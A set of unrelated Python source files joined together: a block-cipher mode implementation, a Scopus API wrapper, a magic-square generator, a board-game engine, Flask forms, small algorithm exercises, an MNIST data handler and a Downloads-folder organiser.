:Return:
the encrypted data, as a byte string. It is as long as
*plaintext* with one exception: when encrypting the first message
chunk with `MODE_OPENPGP`, the encypted IV is prepended to the
returned ciphertext.
"""
if self.mode == MODE_OPENPGP:
padding_length = (self.block_size - len(plaintext) % self.block_size) % self.block_size
if padding_length > 0:
# CFB mode requires ciphertext to have length multiple
# of block size,
# but PGP mode allows the last block to be shorter
if self._done_last_block:
raise ValueError("Only the last chunk is allowed to have length not multiple of %d bytes",
self.block_size)
self._done_last_block = True
padded = plaintext + b('\x00') * padding_length
res = self._cipher.encrypt(padded)[:len(plaintext)]
else:
res = self._cipher.encrypt(plaintext)
if not self._done_first_block:
res = self._encrypted_IV + res
self._done_first_block = True
return res
if self.mode in (MODE_CCM, MODE_EAX, MODE_SIV, MODE_GCM):
if self.encrypt not in self._next:
raise TypeError("encrypt() can only be called after initialization or an update()")
self._next = [self.encrypt, self.digest]
if self.mode == MODE_CCM:
if self._assoc_len is None:
self._start_ccm(assoc_len=self._cipherMAC.get_len())
if self._msg_len is None:
self._start_ccm(msg_len=len(plaintext))
self._next = [self.digest]
if not self._done_assoc_data:
self._cipherMAC.zero_pad()
self._done_assoc_data = True
self._cipherMAC.update(plaintext)
if self.mode == MODE_SIV:
self._next = [self.digest]
if self.nonce:
self._cipherMAC.update(self.nonce)
self._cipherMAC.update(plaintext)
self._cipher = self._siv_ctr_cipher(self._cipherMAC.derive())
ct = self._cipher.encrypt(plaintext)
if self.mode == MODE_EAX:
self._omac[2].update(ct)
if self.mode == MODE_GCM:
if not self._done_assoc_data:
self._cipherMAC.zero_pad()
self._done_assoc_data = True
self._cipherMAC.update(ct)
self._msg_len += len(plaintext)
return ct
def decrypt(self, ciphertext):
"""Decrypt data with the key and the parameters set at initialization.
A cipher object is stateful: once you have decrypted a message
you cannot decrypt (or encrypt) another message with the same
object.
For `MODE_SIV` (always) and `MODE_CCM` (when ``msg_len`` was not
passed at initialization), this method can be called only **once**.
For all other modes, the data to decrypt can be broken up in two or
more pieces and `decrypt` can be called multiple times.
That is, the statement:
>>> c.decrypt(a) + c.decrypt(b)
is equivalent to:
>>> c.decrypt(a+b)
That also means that you cannot reuse an object for encrypting
or decrypting other data with the same key.
This function does not remove any padding from the plaintext.
- For `MODE_ECB` and `MODE_CBC`, *ciphertext* length (in bytes) must
be a multiple of *block_size*.
- For `MODE_CFB`, *ciphertext* length (in bytes) must be a multiple
of *segment_size*/8.
- For `MODE_OFB`, `MODE_CTR` and all AEAD modes
*ciphertext* can be of any length.
- For `MODE_OPENPGP`, *plaintext* must be a multiple of *block_size*,
unless it is the last chunk of the message.
- For `MODE_SIV`, *ciphertext* can be of any length, but it must also
include the MAC (concatenated at the end).
:Parameters:
ciphertext : byte string
The piece of data to decrypt (plus the MAC, for `MODE_SIV` only).
:Return: the decrypted data (byte string).
"""
if self.mode == MODE_OPENPGP:
padding_length = (self.block_size - len(ciphertext) % self.block_size) % self.block_size
if padding_length > 0:
# CFB mode requires ciphertext to have length multiple
# of block size,
# but PGP mode allows the last block to be shorter
if self._done_last_block:
raise ValueError("Only the last chunk is allowed to have length not multiple of %d bytes",
self.block_size)
self._done_last_block = True
padded = ciphertext + b('\x00') * padding_length
res = self._cipher.decrypt(padded)[:len(ciphertext)]
else:
res = self._cipher.decrypt(ciphertext)
return res
if self.mode == MODE_SIV:
raise TypeError("decrypt() not allowed for SIV mode."
" Use decrypt_and_verify() instead.")
if self.mode in (MODE_CCM, MODE_EAX, MODE_GCM):
if self.decrypt not in self._next:
raise TypeError("decrypt() can only be called after initialization or an update()")
self._next = [self.decrypt, self.verify]
if self.mode == MODE_CCM:
if self._assoc_len is None:
self._start_ccm(assoc_len=self._cipherMAC.get_len())
if self._msg_len is None:
self._start_ccm(msg_len=len(ciphertext))
self._next = [self.verify]
if not self._done_assoc_data:
self._cipherMAC.zero_pad()
self._done_assoc_data = True
if self.mode == MODE_GCM:
if not self._done_assoc_data:
self._cipherMAC.zero_pad()
self._done_assoc_data = True
self._cipherMAC.update(ciphertext)
self._msg_len += len(ciphertext)
if self.mode == MODE_EAX:
self._omac[2].update(ciphertext)
pt = self._cipher.decrypt(ciphertext)
if self.mode == MODE_CCM:
self._cipherMAC.update(pt)
return pt
def digest(self):
"""Compute the *binary* MAC tag in an AEAD mode.
When using an AEAD mode like CCM or EAX, the caller invokes
this function at the very end.
This method returns the MAC that shall be sent to the receiver,
together with the ciphertext.
:Return: the MAC, as a byte string.
"""
if self.mode not in (MODE_CCM, MODE_EAX, MODE_SIV, MODE_GCM):
raise TypeError("digest() not supported by this mode of operation")
if self.digest not in self._next:
raise TypeError("digest() cannot be called when decrypting or validating a message")
self._next = [self.digest]
return self._compute_mac()
def _compute_mac(self):
"""Compute MAC without any FSM checks."""
if self._tag:
return self._tag
if self.mode == MODE_CCM:
if self._assoc_len is None:
self._start_ccm(assoc_len=self._cipherMAC.get_len())
if self._msg_len is None:
self._start_ccm(msg_len=0)
self._cipherMAC.zero_pad()
self._tag = strxor(self._cipherMAC.digest(),
self._s_0)[:self._mac_len]
if self.mode == MODE_GCM:
# Step 5 in NIST SP 800-38D, Algorithm 4 - Compute S
self._cipherMAC.zero_pad()
auth_len = self._cipherMAC.get_len() - self._msg_len
for tlen in (auth_len, self._msg_len):
self._cipherMAC.update(long_to_bytes(8 * tlen, 8))
s_tag = self._cipherMAC.digest()
# Step 6 - Compute T
self._tag = self._tag_cipher.encrypt(s_tag)[:self._mac_len]
if self.mode == MODE_EAX:
tag = bchr(0) * self.block_size
for i in range(3):
tag = strxor(tag, self._omac[i].digest())
self._tag = tag[:self._mac_len]
if self.mode == MODE_SIV:
self._tag = self._cipherMAC.derive()
return self._tag
def hexdigest(self):
"""Compute the *printable* MAC tag in an AEAD mode.
This method is like `digest`.
:Return: the MAC, as a hexadecimal string.
"""
return "".join(["%02x" % bord(x) for x in self.digest()])
def verify(self, mac_tag):
"""Validate the *binary* MAC tag in an AEAD mode.
When using an AEAD mode like CCM or EAX, the caller invokes
this function at the very end.
This method checks if the decrypted message is indeed valid
(that is, if the key is correct) and it has not been
tampered with while in transit.
:Parameters:
mac_tag : byte string
This is the *binary* MAC, as received from the sender.
:Raises ValueError:
if the MAC does not match. The message has been tampered with
or the key is incorrect.
"""
if self.mode not in (MODE_CCM, MODE_EAX, MODE_SIV, MODE_GCM):
raise TypeError("verify() not supported by this mode of operation")
if self.verify not in self._next:
raise TypeError("verify() cannot be called when encrypting a message")
self._next = [self.verify]
res = 0
# Constant-time comparison
for x, y in zip(self._compute_mac(), mac_tag):
res |= bord(x) ^ bord(y)
if res or len(mac_tag) != self._mac_len:
raise ValueError("MAC check failed")
def hexverify(self, hex_mac_tag):
"""Validate the *printable* MAC tag in an AEAD mode.
This method is like `verify`.
:Parameters:
hex_mac_tag : string
This is the *printable* MAC, as received from the sender.
:Raises ValueError:
if the MAC does not match. The message has been tampered with
or the key is incorrect.
"""
self.verify(unhexlify(hex_mac_tag))
def encrypt_and_digest(self, plaintext):
"""Perform encrypt() and digest() in one step.
:Parameters:
plaintext : byte string
The piece of data to encrypt.
:Return:
a tuple with two byte strings:
- the encrypted data
- the MAC
"""
return self.encrypt(plaintext), self.digest()
def decrypt_and_verify(self, ciphertext, mac_tag):
"""Perform decrypt() and verify() in one step.
:Parameters:
ciphertext : byte string
The piece of data to decrypt.
mac_tag : byte string
This is the *binary* MAC, as received from the sender.
:Return: the decrypted data (byte string).
:Raises ValueError:
if the MAC does not match. The message has been tampered with
or the key is incorrect.
"""
if self.mode == MODE_SIV:
if self.decrypt not in self._next:
raise TypeError("decrypt() can only be called"
" after initialization or an update()")
self._next = [self.verify]
# Take the MAC and start the cipher for decryption
self._mac = mac_tag
self._cipher = self._siv_ctr_cipher(self._mac)
pt = self._cipher.decrypt(ciphertext)
if self.nonce:
self._cipherMAC.update(self.nonce)
if pt:
self._cipherMAC.update(pt)
else:
pt = self.decrypt(ciphertext)
self.verify(mac_tag)
return pt
|
import os
import xml.etree.ElementTree as ET
import warnings
from scopus import config
from scopus.utils import get_content, get_encoded_text
SCOPUS_AFFILIATION_DIR = os.path.expanduser('~/.scopus/affiliation')
if not os.path.exists(SCOPUS_AFFILIATION_DIR):
os.makedirs(SCOPUS_AFFILIATION_DIR)
class ScopusAffiliation:
@property
def affiliation_id(self):
"""The Scopus ID of the affiliation."""
return get_encoded_text(self.xml, 'coredata/dc:identifier').split(":")[-1]
@property
def date_created(self):
"""Date the Scopus record was created."""
date_created = self.xml.find('institution-profile/date-created')
if date_created is not None:
date_created = (int(date_created.attrib['year']),
int(date_created.attrib['month']),
int(date_created.attrib['day']))
else:
date_created = (None, None, None)
return date_created
@property
def nauthors(self):
"""Number of authors in the affiliation."""
return get_encoded_text(self.xml, 'coredata/author-count')
@property
def ndocuments(self):
"""Number of documents for the affiliation."""
return get_encoded_text(self.xml, 'coredata/document-count')
@property
def url(self):
"""URL to the affiliation's profile page."""
url = self.xml.find('coredata/link[@rel="scopus-affiliation"]')
if url is not None:
url = url.get('href')
return url
@property
def api_url(self):
"""URL to the affiliation's API page."""
return get_encoded_text(self.xml, 'coredata/prism:url')
@property
def org_type(self):
"""Type of the affiliation (only present if profile is org profile)."""
return get_encoded_text(self.xml, 'institution-profile/org-type')
@property
def org_domain(self):
"""Internet domain of the affiliation."""
return get_encoded_text(self.xml, 'institution-profile/org-domain')
@property
def org_url(self):
"""Website of the affiliation."""
return get_encoded_text(self.xml, 'institution-profile/org-URL')
@property
def name(self):
"""The name of the affiliation."""
return get_encoded_text(self.xml, 'affiliation-name')
@property
def address(self):
"""The address of the affiliation."""
return get_encoded_text(self.xml, 'address')
@property
def city(self):
"""The city of the affiliation."""
return get_encoded_text(self.xml, 'city')
@property
def state(self):
"""The state (country's administrative sububunit) of the affiliation."""
return get_encoded_text(self.xml, 'state')
@property
def country(self):
"""The country of the affiliation."""
return get_encoded_text(self.xml, 'country')
def __init__(self, aff_id, refresh=False):
"""Class to represent an Affiliation in Scopus.
Parameters
----------
aff_id : str or int
The Scopus Affiliation ID. Optionally expressed
as an Elsevier EID (i.e., in the form 10-s2.0-nnnnnnnn).
refresh : bool (optional, default=False)
Whether to refresh the cached file if it exists or not.
Notes
-----
The files are cached in ~/.scopus/affiliation/{aff_id}.
"""
if config.getboolean('Warnings', 'Affiliation'):
text = config.get('Warnings', 'Text').format('ContentAffiliationRetrieval')
warnings.warn(text, DeprecationWarning)
config.set('Warnings', 'Affiliation', '0')
aff_id = str(int(str(aff_id).split('-')[-1]))
qfile = os.path.join(SCOPUS_AFFILIATION_DIR, aff_id)
url = ('https://api.elsevier.com/content/affiliation/'
'affiliation_id/{}'.format(aff_id))
self.xml = ET.fromstring(get_content(qfile, url=url, refresh=refresh))
def __str__(self):
s = '''{self.name} ({self.nauthors} authors, {self.ndocuments} documents)
{self.address}
{self.city}, {self.country}
{self.url}'''.format(self=self)
return s
|
#! /usr/bin/env python
# coding:utf-8
# 判断输入的九宫格的格数是否为奇数
def if_odd(n):
if n % 2 == 1:
return True
else:
return False
# 九宫格填写数的法则
"""
按照下面的方式排列
-------------->x(从1到n)
|
|
|y方向(从1到n)
1、第一个数放在X方向的中间位置
2、其它数顺次放置各个位置,并依据如下原则:(假设第一个数是a,第二个数是b)
以a为中心的位置关系分别为:
左上|上|右上
左 |a |右
左下|下|右下
(1)b放在a的右上位置。a(x,y)-->b(x+1,y-1)
(2)如果仅有“右”位置超过边界,即x+1>n,则b(1,y-1)
(3)如果仅有“上”位置超过边界,即y-1<0,则b(x+1,n)
(4)如果“右”“上”位置都超过边界,即x+1>n,y-1<o,则b(x,y+1)
(5)如果“右上”已经有值,则b(x,y+1)
"""
def sudoku_rule(n, sudoku):
tx = n / 2
ty = 0
for i in range(n * n):
sudoku[ty][tx] = i + 1
tx = tx + 1
ty = ty - 1
if ty < 0 and tx >= n: # 条件(4)
tx = tx - 1
ty = ty + 2
elif ty < 0: # (3)
ty = n - 1
elif tx >= n: # (2)
tx = 0
elif sudoku[ty][tx] != 0: # (5)
tx = tx - 1
ty = ty + 2
return sudoku
if __name__ == "__main__":
n = 5
sudoku = [[0 for i in range(n)] for i in range(n)]
s = sudoku_rule(n, sudoku)
for line in s:
print
line
|
import pygame
from utility import *
import variables
from constants import *
def place_brick(idx):
brick_idx = coord2idx(variables.HAND_BRICK[idx][0],variables.HAND_BRICK[idx][1])
brick_display = variables.HAND_BRICK[idx][0]*10+variables.HAND_BRICK[idx][1]
variables.BRICK_COLOR[brick_idx]=-2
variables.HAND_BRICK[idx] = (0,0)
variables.ON_BOARD_NUM += 1
variables.BLANK_BLOCK_NUM-=1
variables.MY_LOG+="%s放置了T%s\n" %(variables.PLAYER_NAME[variables.TURN],brick_display)
return brick_idx
def take_brick():
idx = variables.HAND_BRICK.index((0,0))
if variables.REMAINING_BLOCK_NUM==0:
return -1
else:
n_brick = random.choice(variables.REMAINING_BLOCK)
variables.HAND_BRICK[idx] = idx2coord(n_brick)
variables.REMAINING_BLOCK.remove(n_brick)
variables.REMAINING_BLOCK_NUM-=1
return n_brick
def real_neibour(brick):
assert 0<=brick<=107, "INVALID BRICK!"
x,y = idx2coord(brick)
neibours = [(x,y-1),(x,y+1),(x-1,y),(x+1,y)]
real_neibours = []
for neibour in neibours:
if 0<neibour[0]<13 and 0<neibour[1]<10:
real_neibours.append(coord2idx(neibour[0],neibour[1]))
# print(real_neibours)
return real_neibours
def detect_connection(brick):
neibour = real_neibour(brick)
cnt = 0 #how many kind of companys
cnt_list = [0,]*9
for i in neibour:
if variables.BRICK_COLOR[i]>=0 and cnt_list[variables.BRICK_COLOR[i]]==0: #company
cnt+=1
cnt_list[variables.BRICK_COLOR[i]]+=1
if cnt==0 and cnt_list[-2]==0:
return -1
return cnt
def expand(brick):
neibour = real_neibour(brick)
single_brick = [brick,]
company_id = -1
for i in neibour:
if variables.BRICK_COLOR[i]==-2: #single brick
single_brick.append(i)
elif 0<=variables.BRICK_COLOR[i]<7: #company
company_id = variables.BRICK_COLOR[i]
for b in single_brick:
variables.BRICK_COLOR[b]=company_id
variables.COMPANY_SIZE[company_id]+=len(single_brick)
update_stock_price()
def acquire_list(brick):
neibour = real_neibour(brick)
company_id_list = []
for i in neibour:
if 0<=variables.BRICK_COLOR[i]<7 and variables.BRICK_COLOR[i] not in company_id_list: #company
company_id_list.append(variables.BRICK_COLOR[i])
return company_id_list
def acquire(brick,large_idx):
neibour = real_neibour(brick)
single_brick = [brick,]
small_company_id = -1
for i in neibour:
if variables.BRICK_COLOR[i]==-2: #single brick
single_brick.append(i)
elif 0<=variables.BRICK_COLOR[i]<7 and variables.BRICK_COLOR[i]!=large_idx:
small_company_id = variables.BRICK_COLOR[i]
for b in single_brick:
variables.BRICK_COLOR[b]=large_idx
variables.MY_LOG+="%s公司收购了%s公司\n" %(COMPANY_NAME[variables.LARGE_COMPANY],COMPANY_NAME[variables.SMALL_COMPANY])
variables.COMPANY_SIZE[large_idx]+=(variables.COMPANY_SIZE[small_company_id]+len(single_brick))
variables.BRICK_COLOR=[large_idx if value == small_company_id else value for value in variables.BRICK_COLOR]
variables.COMPANY_SIZE[small_company_id]=0
variables.LIVE_COMPANY[small_company_id]=0
company_stock_list = [stock[small_company_id] for stock in variables.MAJOR_MINOR]
large_num = company_stock_list.count(2)
small_num = company_stock_list.count(1)
if small_num==0: #common major or only one major
share = 15*variables.COMPANY_PRICE[small_company_id]
for i in range(variables.NUM_PLAYER):
if variables.MAJOR_MINOR[i][small_company_id]==2:
ma_share = share//100//large_num*100
variables.MONEY[i]+=ma_share
variables.MY_LOG+="%s作为大股东获得分红%s\n" %(variables.PLAYER_NAME[i],ma_share)
else:
l_share = 10*variables.COMPANY_PRICE[small_company_id]
s_share = 5*variables.COMPANY_PRICE[small_company_id]
for i in range(variables.NUM_PLAYER):
if variables.MAJOR_MINOR[i][small_company_id]==2:
ma_share = l_share//100//large_num*100
variables.MONEY[i]+=ma_share
variables.MY_LOG+="%s作为大股东获得分红%s\n" %(variables.PLAYER_NAME[i],ma_share)
elif variables.MAJOR_MINOR[i][small_company_id]==1:
mi_share = s_share//100//small_num*100
variables.MONEY[i]+=mi_share
variables.MY_LOG+="%s作为二股东获得分红%s\n" %(variables.PLAYER_NAME[i],mi_share)
def desert(brick):
variables.BRICK_COLOR[brick]=-3
def establish(brick,selection):
neibour = real_neibour(brick)
single_brick = [brick,]
for i in neibour:
if variables.BRICK_COLOR[i]==-2: #single brick
single_brick.append(i)
for b in single_brick:
variables.BRICK_COLOR[b]=selection
variables.COMPANY_SIZE[selection]+=len(single_brick)
variables.LIVE_COMPANY[selection]=1
if variables.COMPANY_STOCK_NUM[selection]>0:
variables.STOCK_AT_HAND[variables.TURN][selection]+=1
variables.COMPANY_STOCK_NUM[selection]-=1
variables.MY_LOG+="%s建立了公司%s\n" %(variables.PLAYER_NAME[variables.TURN],COMPANY_NAME[selection])
def update_stock_price():
for i in range(7):
c_sz = variables.COMPANY_SIZE[i]
if c_sz == 0:
price = 0
elif 2<=c_sz<=5:
price = COMPANY_PRICE_TABLE[COMPANY[COMPANY_NAME[i]]+c_sz-2]
elif 5<c_sz<=10:
price = COMPANY_PRICE_TABLE[COMPANY[COMPANY_NAME[i]]+4]
elif 10<c_sz<=20:
price = COMPANY_PRICE_TABLE[COMPANY[COMPANY_NAME[i]]+5]
elif 20<c_sz<=30:
price = COMPANY_PRICE_TABLE[COMPANY[COMPANY_NAME[i]]+6]
elif 30<c_sz<=40:
price = COMPANY_PRICE_TABLE[COMPANY[COMPANY_NAME[i]]+7]
elif c_sz>40:
price = COMPANY_PRICE_TABLE[COMPANY[COMPANY_NAME[i]]+8]
variables.COMPANY_PRICE[i]=price
def major_minor():
for i in range(7):
if variables.LIVE_COMPANY[i]==0:
for j in range(variables.NUM_PLAYER):
variables.MAJOR_MINOR[j][i]=0
elif variables.LIVE_COMPANY[i]==1:
company_stock_list = [stock[i] for stock in variables.STOCK_AT_HAND]
sorted_list = sorted(enumerate(company_stock_list), key=lambda x: x[1],reverse=True)
idx = [i[0] for i in sorted_list]
nums = [i[1] for i in sorted_list]
major_num = nums[0]
if major_num==0:
for j in range(variables.NUM_PLAYER):
variables.MAJOR_MINOR[idx[j]][i]=0
else:
if nums.count(major_num)>=2: #common major
for j in range(nums.count(major_num)):
variables.MAJOR_MINOR[idx[j]][i]=2
else:
minor_num = nums[1]
variables.MAJOR_MINOR[idx[0]][i]=2
if minor_num==0:
for j in range(nums.count(minor_num)):
variables.MAJOR_MINOR[idx[j+1]][i]=0
else:
for j in range(nums.count(minor_num)):
variables.MAJOR_MINOR[idx[j+1]][i]=1
def end_turn():
is_end = check_final()
if is_end==1:
variables.MY_LOG+="\n游戏结束!\n"
elif is_end==0:
variables.TURN=(variables.TURN+1)%variables.NUM_PLAYER
variables.BUY_STOCK_NUM=0
variables.place_flag = False
variables.brick_idx = None
variables.establish_flag = False
variables.acquire_flag = False
variables.buy_stock_flag = False
variables.has_put_flag = False
variables.has_buy_flag = False
variables.AC_LIST = [0,]*7
variables.MY_LOG+="\n轮到%s执行\n" %(variables.PLAYER_NAME[variables.TURN])
def others_place_brick(brick_idx):
brick_coord = idx2coord(brick_idx)
brick_display = brick_coord[0]*10+brick_coord[1]
variables.BRICK_COLOR[brick_idx]=-2
variables.ON_BOARD_NUM += 1
variables.BLANK_BLOCK_NUM-=1
variables.MY_LOG+="%s放置了T%s\n" %(variables.PLAYER_NAME[variables.TURN],brick_display)
cnt = detect_connection(brick_idx)
if cnt==-1:
pass
elif cnt==0: #single
variables.MY_LOG+="等待%s选择建立的公司\n" %(variables.PLAYER_NAME[variables.TURN])
elif cnt==1: #expand
expand(brick_idx)
elif cnt==2: #acquire
c1,c2 = acquire_list(brick_idx)
if variables.COMPANY_SIZE[c1]>=2 and variables.COMPANY_SIZE[c2]>=2: #safe company
desert(brick_idx)
variables.MY_LOG+="均为安全公司,废弃地块%s\n" %(idx2str(brick_idx))
else:
variables.MY_LOG+="进行并购操作\n"
elif cnt==3: #desert
desert(brick_idx)
variables.MY_LOG+="废弃地块\n"
def others_buy_stock(buy_stock_list):
variables.MONEY[variables.TURN] -= buy_cost(buy_stock_list)
# variables.BUY_STOCK_NUM+=sum(variables.BUY_STOCK_LIST)
variables.MY_LOG+="%s购买了" %(variables.PLAYER_NAME[variables.TURN])
for i in range(len(buy_stock_list)):
variables.STOCK_AT_HAND[variables.TURN][i]+=buy_stock_list[i]
variables.COMPANY_STOCK_NUM[i]-=buy_stock_list[i]
if buy_stock_list[i]!=0:
variables.MY_LOG+="%s股%s, " %(buy_stock_list[i],COMPANY_NAME[i])
variables.MY_LOG+="\n"
major_minor()
def ohters_new_brick(brick_idx):
variables.REMAINING_BLOCK.remove(brick_idx)
variables.REMAINING_BLOCK_NUM-=1
def calculate_property(): #money+share+stock
variables.TOTAL_PROPERTY=[0,]*variables.NUM_PLAYER
for i in range(variables.NUM_PLAYER):
variables.TOTAL_PROPERTY[i]+=variables.MONEY[i] #money
for j in range(7): #stock
variables.TOTAL_PROPERTY[i]+=variables.STOCK_AT_HAND[i][j]*variables.COMPANY_PRICE[j]
for k in range(7): #share
company_stock_list = [stock[k] for stock in variables.MAJOR_MINOR]
large_num = company_stock_list.count(2)
small_num = company_stock_list.count(1)
if small_num==0: #common major or only one major
share = 15*variables.COMPANY_PRICE[k]
for i in range(variables.NUM_PLAYER):
if variables.MAJOR_MINOR[i][k]==2:
ma_share = share//100//large_num*100
variables.TOTAL_PROPERTY[i]+=ma_share
# variables.MY_LOG+="%s作为大股东获得分红%s\n" %(variables.PLAYER_NAME[i],ma_share)
else:
l_share = 10*variables.COMPANY_PRICE[k]
s_share = 5*variables.COMPANY_PRICE[k]
for i in range(variables.NUM_PLAYER):
if variables.MAJOR_MINOR[i][k]==2:
ma_share = l_share//100//large_num*100
variables.TOTAL_PROPERTY[i]+=ma_share
# variables.MY_LOG+="%s作为大股东获得分红%s\n" %(variables.PLAYER_NAME[i],ma_share)
elif variables.MAJOR_MINOR[i][k]==1:
mi_share = s_share//100//small_num*100
variables.TOTAL_PROPERTY[i]+=mi_share
# variables.MY_LOG+="%s作为二股东获得分红%s\n" %(variables.PLAYER_NAME[i],mi_share)
sorted_property = sorted(enumerate(variables.TOTAL_PROPERTY), key=lambda x: x[1],reverse=True)
variables.FINAL_RANKING = [i[0] for i in sorted_property]
def check_final():
safe_cnt = 0
for i in range(len(COMPANY_NAME)):
if variables.COMPANY_SIZE[i]>=3: #max size
variables.win_flag = True
return 1
elif variables.COMPANY_SIZE[i]>=2: #safe
safe_cnt+=1
if safe_cnt==7: #all companies are safe
variables.win_flag = True
return 1
else:
return 0 |
from flask.ext.wtf import Form
from wtforms.fields import BooleanField, DateField, HiddenField, \
PasswordField, SelectField, TextField
from wtforms.validators import InputRequired, Length, Required, Email, \
EqualTo, Optional
class LoginForm(Form):
email = TextField('Email Address', validators=[Required(), Email()])
password = PasswordField('Password', validators=[Required()])
remember = BooleanField('Remember Me')
class UserInfoForm(Form):
id = HiddenField('Employee ID', validators=[Required()])
fullName = TextField('Full Name', validators=[Required()])
position = SelectField('Position', coerce=int,
validators=[Optional()])
email = TextField('Email Address', validators=[Required(), Email()])
password = PasswordField(
'New Password',
validators=[EqualTo('confirm', message='Passwords must match.')])
confirm = PasswordField('Repeat Password')
class UserPermForm(Form):
id = HiddenField('Employee ID', validators=[Required()])
access = SelectField('Access Level', coerce=int,
validators=[Required()])
moderator = BooleanField('')
roster = BooleanField('')
class BusinessForm(Form):
id = HiddenField('Business ID', validators=[Required()])
type = SelectField('Record Type', coerce=int)
name = TextField('Registered Name', validators=[Required()])
contact = TextField('Agent Name', validators=[Required()])
phone = TextField('Phone Number', validators=[Required()])
class DocumentForm(Form):
id = HiddenField('Document ID', validators=[Required()])
bizId = HiddenField('Business ID', validators=[Required()])
type = SelectField('Record Type', coerce=int, validators=[Optional()])
expiry = DateField('Expiry Date', format='%m/%d/%Y',
validators=[Required()])
|
def zig_zag(arr):
flag = False
n = len(arr)
i = 0
while i < n-1:
if (not flag and not arr[i] < arr[i+1]) or (flag and not arr[i] > arr[i+1]):
swap = True
else:
swap = False
if swap:
arr[i], arr[i + 1] = arr[i + 1], arr[i]
flag = not flag
i += 1
return arr
a = [9, 6, 1, 7, 5, 2, 3]
print zig_zag(a) |
import numpy as np
import cv2
import sys
import os
import pylab
from poisson_tools import image_to_poisson_trains
from util_functions import *
def img_to_spike_array( img_file_name, save_as_pickle=True ):
img = cv2.imread( img_file_name, cv2.IMREAD_GRAYSCALE )
if img is not None:
height, width = img.shape
spikes = image_to_poisson_trains( np.array( [img.reshape(height*width)] ), # notice reshape
height, width,
max_freq, on_duration, off_duration )
pylab.figure()
raster_plot_spike( spikes )
pylab.show()
#--- Pickle the spike array for further use -------------------------------------------#
if save_as_pickle:
img_file_name = img_file_name[ img_file_name.rfind('/')+1 : img_file_name.rfind('.') ]
pickle_file = "spike_array_{}".format( img_file_name )
pickle_it( spikes, pickle_file )
else:
print( "Image couldn't be read! -> from file ({}) to ({})".format( img_file_name, img ) )
if __name__ == '__main__':
if len( sys.argv ) != 2 and len( sys.argv ) != 5:
print( "Usage:" )
print( "\t python convert_image_to_spike_array.py <img_file_name> <max_freq> <on_duration> <off_duration>" )
print( "or (with the default values for up to a 32x32 image {max_freq=1000} {on_duration=200} {off_duration=100}):" )
print( "\t python convert_image_to_spike_array.py <img_file_name>" )
else:
img_file_name = sys.argv[1]
if len( sys.argv ) > 2:
max_freq = int(sys.argv[2]) # Hz
on_duration = int(sys.argv[3]) # ms
off_duration = int(sys.argv[4]) # ms
else:
max_freq = 1000 # Hz
on_duration = 200 # ms
off_duration = 100 # ms
print( "max_freq: {}".format( max_freq ) )
print( "on_duration: {}".format( on_duration ) )
print( "off_duration: {}".format( off_duration ) )
if os.path.isdir( img_file_name ):
import glob2
image_list = glob2.glob( os.path.join( img_file_name, "**/*.png" ) )
for img in image_list:
if os.path.isfile( img ):
img_to_spike_array( img )
elif os.path.isfile( img_file_name ):
img_to_spike_array( img_file_name )
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def removeNthFromEnd(self, head, n):
"""
:type head: ListNode
:type n: int
:rtype: ListNode
"""
# Need to store all nodes
mem = list()
current = head
while current is not None:
mem.append(current)
current = current.next
size = len(mem)
# Attempting to remove past the head, so just
# return head.next
if n >= size:
return head.next
# Cannot do mem[size-n+1] because this might be None
# and thus does not exist in our memory of all nodes
mem[size-n-1].next = mem[size-n].next
return head
|
from keras.preprocessing.image import ImageDataGenerator
import logging
import pickle
import numpy as np
from keras.utils import np_utils
from ibmfl.data.data_handler import DataHandler
logger = logging.getLogger(__name__)
class MnistTFDataHandler(DataHandler):
"""
Data handler for MNIST dataset.
"""
def __init__(self, data_config=None, channels_first=False):
super().__init__()
self.file_name = None
if data_config is not None:
if 'train_file' in data_config:
self.train_file_name = data_config['train_file']
if 'test_file' in data_config:
self.test_file_name = data_config['test_file']
def get_data(self, nb_points=500):
"""
Gets pre-process mnist training and testing data. Because this method
is for testing it takes as input the number of datapoints, nb_points,
to be included in the training and testing set.
:param: nb_points: Number of data points to be included in each set
:type nb_points: `int`
:return: training data
:rtype: `tuple`
"""
try:
logger.info(
'Loaded training data from ' + str(self.train_file_name))
with open(self.train_file_name, 'rb') as f:
(x_train, y_train)= pickle.load(f)
logger.info(
'Loaded test data from ' + str(self.test_file_name))
with open(self.test_file_name, 'rb') as f:
(x_test, y_test)= pickle.load(f)
x_train = x_train / 255.0
y_train = y_train / 255.0
x_test = x_test / 255.0
y_test = y_test / 255.0
except Exception:
raise IOError('Unable to load training data from path '
'provided in config file: ' +
self.train_file_name)
# Add a channels dimension
import tensorflow as tf
x_train = x_train[..., tf.newaxis]
x_test = x_test[..., tf.newaxis]
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
return (x_train, y_train), (x_test, y_test)
|
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from datetime import datetime
import os
import time
image_extensions = ('.png', '.jpg', '.jpeg', '.svg', '.tiff')
video_extensions = ('.mov', '.mp4', '.mkv', '.avi', '.webm', '.mpeg', '.mpg', '.mpe',
'.mp2', '.ogg', '.wmv', '.mpv', '.m4p', '.m4v', '.qt', '.flv', '.swf', '.avchd')
installer_extensions = ('.exe', '.msi', '.dmg', '.pkg', '.deb')
audio_extensions = ('.mp3', '.m4a', '.wav', '.aiff',
'.acc', '.ogg', '.wma', '.flac', '.alac')
pdfs_extensions = ('.pdf')
folder_to_track = '/Users/sergi/Downloads'
generic_folder_destination = '/Users/sergi/Documents/other'
images_folder_destination = '/Users/sergi/Pictures'
videos_folder_destination = '/Users/sergi/Movies'
audios_folder_destination = '/Users/sergi/Music'
installers_folder_destination = '/Users/sergi/Documents/installers'
pdfs_folder_destination = '/Users/sergi/Documents/pdfs'
log_file = '/Users/sergi/Documents/startup/downloads_automation_log.txt'
def date_time():
now = datetime.now()
return now.strftime('%d/%m/%Y %H:%M:%S')
def print_to_log(message):
f = open(log_file, 'a+')
f.write(message + '\n')
f.close()
def get_file_name(path):
return os.path.splitext(path)[0]
def get_file_extension(path):
return os.path.splitext(path)[1]
def check_file_exists(path):
return os.path.exists(path)
def check_file_completed(path):
historical_size = -1
extension = get_file_extension(path)
downloading_extensions = ('.crdownload', '.download', '.part', '.partial')
if extension in downloading_extensions:
print('Download extension detected:' + extension)
time.sleep(2)
print('Checking again if the extension has changed')
return False
while (historical_size != os.path.getsize(path)):
if historical_size != -1:
print(path + ' -- Waiting for the file to be complete')
historical_size = os.path.getsize(path)
time.sleep(2)
print(path + ' -- File ready to be moved')
return True
